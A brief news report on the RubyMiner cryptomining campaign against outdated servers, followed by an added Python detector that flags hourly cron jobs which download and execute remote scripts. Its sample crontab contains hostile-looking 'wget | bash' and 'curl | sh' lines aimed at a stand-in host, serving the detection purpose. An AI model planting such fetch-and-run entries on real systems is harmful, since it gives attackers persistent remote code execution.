Cyber security specialists from Check Point, Ixia and Certego found that more than 700 Windows and Linux servers are infected with RubyMiner, malicious software used for hidden cryptocurrency mining. The first attacks were noticed last week, but the outbreak became widespread only a few days ago.
Because the miner runs on both Windows and Linux servers, the attackers use the p0f utility to determine the type of server software. If the software is old, they launch exploits that infect the server with a malicious miner, which mines cryptocurrency using other people's computing capacity without the owners' knowledge.
On Linux, the exploit code erases all scheduled tasks and sets a new one: every hour a script is downloaded to the server from a specified resource and installs the mining software. In some cases, PyCryptoMiner is installed on the server after the attack. Attackers sometimes also target Oracle WebLogic servers to mine cryptocurrency.
So far the scale is not large: the wallets connected to RubyMiner contain only 540 dollars in cryptocurrency, but the hackers attacking WebLogic servers could mine several hundred thousand dollars over several months.
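An added detection example (not from the original article or the researchers' reports): it audits a crontab for the hourly download-and-run task described above for Linux servers. It assumes the task is a user-crontab entry and that the script is fetched with wget or curl and handed to an interpreter; the crontab text and the `example.invalid` hosts are constructed.

```python
import re

# Constructed sample crontab (not from a real host or from the reports).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 * * * * wget -q -O - http://downloads.example.invalid/job.txt | bash
@hourly curl -s http://downloads.example.invalid/job.txt | sh
15 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/bin/curl -s -o /dev/null https://status.example.invalid/ping
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
"""

FETCH = re.compile(r"\b(wget|curl|fetch)\b")
# Fetched output piped into an interpreter, or run via command substitution.
EXEC = re.compile(r"\|\s*((ba|da|z|k)?sh|python[0-9.]*|perl|ruby)\b|\$\(|`")

def parse_entry(line):
    """Split a user-crontab line into (schedule_fields, command), or None."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]+\s*=", line):
        return None  # blank line, comment, or environment assignment
    if line.startswith("@"):
        parts = line.split(None, 1)
        return ([parts[0]], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)
    return (parts[:5], parts[5]) if len(parts) == 6 else None

def is_hourly(fields):
    """True for '@hourly' or 'N * * * *' style schedules (once per hour)."""
    if fields == ["@hourly"]:
        return True
    if len(fields) != 5:
        return False
    minute, hour, dom, mon, dow = fields
    return minute.isdigit() and hour in ("*", "*/1") and (dom, mon, dow) == ("*", "*", "*")

def suspicious_entries(crontab_text):
    """Return (line_number, command) for hourly jobs that fetch and execute remote content."""
    hits = []
    for n, line in enumerate(crontab_text.splitlines(), 1):
        entry = parse_entry(line)
        if entry and is_hourly(entry[0]) and FETCH.search(entry[1]) and EXEC.search(entry[1]):
            hits.append((n, entry[1]))
    return hits

if __name__ == "__main__":
    for n, cmd in suspicious_entries(SAMPLE_CRONTAB):
        print(f"line {n}: {cmd}")
```

Feed it the output of `crontab -l` for each account; a table that has shrunk to a single hourly fetch job is also worth comparing against a known-good backup.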